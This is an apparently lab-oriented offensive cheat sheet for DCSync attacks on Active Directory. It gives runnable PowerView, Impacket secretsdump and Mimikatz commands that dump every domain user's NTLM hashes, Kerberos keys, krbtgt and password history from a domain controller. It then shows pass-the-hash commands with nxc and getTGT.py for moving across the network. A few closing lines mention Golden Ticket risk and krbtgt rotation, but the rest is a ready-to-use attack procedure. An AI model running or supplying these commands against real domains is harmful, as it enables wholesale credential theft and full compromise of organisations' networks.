DCSync abuses AD replication rights to ask a domain controller for password data as if we were another DC. The classic target is krbtgt, but the same primitive can dump one user, all domain users, NTLM hashes, Kerberos keys, and password history.
Required rights on the domain naming context
DS-Replication-Get-Changes
DS-Replication-Get-Changes-All
DS-Replication-Get-Changes-In-Filtered-Set
Check replication rights with PowerView
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity "DC=ootw,DC=local" -ResolveGUIDs |
Where-Object { $_.ObjectAceType -match "Replication-Get" -or $_.ActiveDirectoryRights -match "GenericAll|AllExtendedRights" }
Impacket dump full domain
secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -just-dc -dc-ip 10.10.10.200 -outputfile ntds
Impacket dump one user
secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -just-dc-user krbtgt -dc-ip 10.10.10.200
Impacket with hash
secretsdump.py 'ootw.local/Administrator@10.10.10.200' -hashes :NTLM_HASH -just-dc -dc-ip 10.10.10.200 -outputfile ntds
Impacket with Kerberos
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass 'ootw.local/Administrator@dc01.ootw.local' -just-dc -dc-ip 10.10.10.200 -outputfile ntds
Password history
secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -just-dc -history -dc-ip 10.10.10.200 -outputfile ntds_history
Only NTLM material
secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -just-dc-ntlm -dc-ip 10.10.10.200 -outputfile ntds_ntlm
Mimikatz DCSync
privilege::debug
lsadump::dcsync /domain:ootw.local /user:krbtgt
lsadump::dcsync /domain:ootw.local /all /csv
Use dumped hash
nxc smb 10.10.10.0/24 -u Administrator -H NTLM_HASH
getTGT.py -hashes :NTLM_HASH ootw.local/Administrator
Notes
DCSync is domain compromise level. If krbtgt is exposed, Golden Ticket risk exists until a proper double rotation is completed.
The account performing DCSync does not need to be Domain Admin if the replication rights were delegated.